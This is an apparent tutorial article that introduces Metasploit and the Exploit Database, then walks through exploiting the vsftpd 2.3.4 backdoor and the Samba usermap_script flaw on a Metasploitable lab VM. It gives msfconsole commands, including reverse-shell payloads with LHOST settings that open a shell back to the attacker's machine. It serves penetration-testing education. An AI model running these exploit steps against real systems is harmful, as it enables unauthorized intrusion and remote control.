Introduction to Metasploit
Metasploit is a mighty and elastic framework that you can use in the development, examination, and implementation of exploits. In 2003 H.D. Moore created it, but today it’s one of the most frequently used cybersecurity penetration testing tools around. Its purpose is to provide information about security vulnerabilities while helping with penetration testing and IDS signature development.
There are many parts to Metasploit:
- msfconsole: The framework's main interface offers an efficient CLI (command-line interface) for accessing and managing features.
- msfvenom: This combines Metasploit's payload generation –– msfpayload –– with its encoding capabilities –– msfencode. It lets users generate payloads and customize them.
- Meterpreter: A sophisticated payload that operates on target memory in real-time. It provides further control and interaction.
Cybersecurity professionals use Metasploit for many reasons:
- Vulnerability Assessment: Identifying vulnerabilities within systems or applications, then testing them.
- Penetration Testing: Simulating cyber-attacks to gauge how secure systems are.
- Exploit Development: Writing code meant to take advantage of a vulnerability so you can test it against an affected system or application.
- Security Research: Studying vulnerabilities, creating new exploits, and building stronger security awareness overall.
Introduction to Exploits
In the realm of cybersecurity, being a professional requires an understanding of the difference between exploits and attacks. Exploits are software, data or sequence of commands that exploit vulnerabilities in systems in order to cause unintended behavior on computer software, hardware, or electronic (usually computerized) things. This behavior could include gaining control over system resources or accessing unauthorized data. Attacks on the other hand are a deliberate attempt by attackers to access, steal, destroy or manipulate information or to disrupt legitimate users' access.
The Exploit Development Lifecycle
The exploit development lifecycle is a systematic approach to finding vulnerabilities and developing and deploying exploits against a target system or application. It typically involves the following stages:
- Reconnaissance: Gathering information about target systems to identify potential vulnerabilities. This can involve scanning various tools of the system to learn its architecture, services and open ports.
- Vulnerability Analysis: Analyzing collected information to find weaknesses that can be exploited. It requires understanding what vulnerabilities do and how it can be used.
- Exploit Development: Building an exploit that targets identified weaknesses requires deep programming knowledge and understanding of attacked systems.
- Testing: Putting created exploit through tests in controlled environment ensures no damage is done while achieving goals as well as allows refining.
- Deployment: Using the built exploit against target system with goals such as unauthorized access or secret extraction in mind.
- Post-Exploitation: Tasking yourself with increasing privileges after successful exploitation helps you keep your access for long while avoiding detection.
- Analysis and Reporting: Documenting everything about results of your work from process itself through outcomes up until any possible impacts on attacked systems.
Difference between Exploits and Attacks
Although people often use them interchangeably "exploit" & "attack" have different meanings:
- Exploit: An exploit is a tool or technique that uses vulnerability in software/systems in order provoke action developers did not intend for. The main focus here should be put on vulnerability itself and how it can be used to gain unauthorized access or information disclosure.
- Attack: The term attack is much broader and can refer to any attempt of exposing, altering, disabling, stealing, destroying or gaining unauthorized access / unauthorized use of an asset. Although it usually involves using one or more exploits it's also about attacker intent and objectives.
Exploit Database: How to find and exploit vulnerabilities
A comprehensive compilation of exploits, security papers, and shellcode is stored in what is referred to as the Exploit Database (EDB). Security professionals, researchers, and ethical hackers leverage this database to unearth vulnerabilities in software and systems. Offensive Security manages it; the same organization that runs Kali Linux and OSCP certification. The EDB offers in-depth details on identified vulnerabilities together with their corresponding exploits. Because of this its an indispensable resource for both vulnerability assessments as well as penetration testing.
Here’s how you can use it:
- Visit the Exploit Database website.
- Use the search bar to key in related keywords associated with app targets, services involved or any vulnerability you are interested in.
- You have options to search by software names, CVE (Common Vulnerabilities and Exposures) identifiers or any related term.
- Advanced search options allow users to filter results either by author, type (e.g., remote, local, web apps), platform (e.g., Windows, Linux, web) or date.
SearchSploit is a command-line search tool meant for Exploit Database; It comes bundled with Kali Linux yet available on other platforms too. Offline searches for exploits can be done using it; coupled with updates from latest EDB entries.
On your Kali Linux terminal execute searchsploit <search terms>
. For example, searchsploit apache 2.4
.
Vulnerability Scanning and Identification
In our previous article we have already performed OpenVAS scan against our Metasploitable VM which had reported a bunch of vulnerabilities. So in this article we will be trying to exploit those vulnerabilities.
Exploiting Known Vulnerabilities using Metasploit
1. Exploit CVE-2011-2523
As per the OpenVAS scan report, Metasploitable has a known vulnerability for VSFTPD:
Issue ----- NVT: vsftpd Compromised Source Packages Backdoor Vulnerability OID: 1.3.6.1.4.1.25623.1.0.103185 Threat: High (CVSS: 9.8) Port: 6200/tcp Summary: vsftpd is prone to a backdoor vulnerability. Affected Software/OS: The vsftpd 2.3.4 source package downloaded between 20110630 and 20110703 is affected. Vulnerability Detection Method: Details: vsftpd Compromised Source Packages Backdoor Vulnerability (OID: 1.3.6.1.4.1.25623.1.0.103185) Version used: 2023-12-07T05:05:41Z References: cve: CVE-2011-2523 url: https://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html url: https://web.archive.org/web/20210127090551/https://www.securityfocus.com/bid/48539/ url: https://security.appspot.com/vsftpd.html
We will attempt to exploit this vulnerability using Metasploit available on Kali Linux.
- Step 1: Open Metasploit with
msfconsole
in your terminal. - Step 2: Search for an exploit matching one of the vulnerabilities found. For example, if OpenVAS found a vulnerable vsFTPd server, you might use:
search vsftpd
. - Step 3: Use the appropriate exploit:
use exploit/unix/ftp/vsftpd_234_backdoor
. - Step 4: Set RHOSTS to the target's IP address:
set RHOSTS [target_IP]
. - Step 5: Set the payload if necessary:
set payload cmd/unix/interact
. - Step 6: Execute the exploit:
exploit
.
Here are the steps executed on my msfconsole terminal and it shows successful exploitation of a known vulnerability in vsFTPd 2.3.4 using the Metasploit framework.
The final line indicates that a command shell session was opened between our machine (10.10.1.10
) and the target (10.10.1.11
), through which we can execute commands directly on the compromised system. The port 6200
suggests that the backdoor listener was established on this non-standard port.
This would mean that we now have full administrative access to the target system, This allows us to perform any action on the target system such as modifying files, installing software, or accessing all data on the machine.
Here I have executed some commands on the connected shell:
Hit exit to terminate the connected session
exit [*] 10.10.1.11 - Command shell session 2 closed.
And the same file is successfully created on target system:
2. Exploit CVE-2007-2447
My Metasploitable VM has also reported for CVE-2007-2447 which is a vulnerability in Samba's username map script. This vulnerability allows remote attackers to execute arbitrary commands via shell metacharacters involving the "username map script" setting when not properly sanitized.
Here are the details of the vulnerability:
Issue ----- NVT: Samba MS-RPC Remote Shell Command Execution Vulnerability - Active Check OID: 1.3.6.1.4.1.25623.1.0.108011 Threat: Medium (CVSS: 6.0) Port: 445/tcp Product detection result: cpe:/a:samba:samba:3.0.20 Detected by: SMB NativeLanMan (OID: 1.3.6.1.4.1.25623.1.0.102011) Summary: Samba is prone to a vulnerability that allows attackers to execute arbitrary shell commands because the software fails to sanitize user-s! upplied input. Impact: An attacker may leverage this issue to execute arbitrary shell commands on an affected system with the privileges of the application. Product Detection Result: Product:cpe:/a:samba:samba:3.0.20 Method:SMB NativeLanMan (OID: 1.3.6.1.4.1.25623.1.0.102011) References: cve: CVE-2007-2447 url: http://www.securityfocus.com/bid/23972 url: https://www.samba.org/samba/security/CVE-2007-2447.html
Let's again connect to msfconsole
on our Kali Linux terminal and search for the Samba exploit.
Select the exploit module:
msf6 > use exploit/multi/samba/usermap_script [*] No payload configured, defaulting to cmd/unix/reverse_netcat
Set the target host (RHOSTS
) to the IP address of the vulnerable system.
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.1.11 RHOSTS => 10.10.1.11
Optionally, if you need to set the payload, you might choose a reverse shell payload
msf6 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse PAYLOAD => cmd/unix/reverse
Set your local host IP address (LHOST
) as needed for the reverse connection.
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.1.10 LHOST => 10.10.1.10
Type exploit
to execute the exploit and we have successfully gained access to target system. We can also see the file which we had created in the previous step on target system.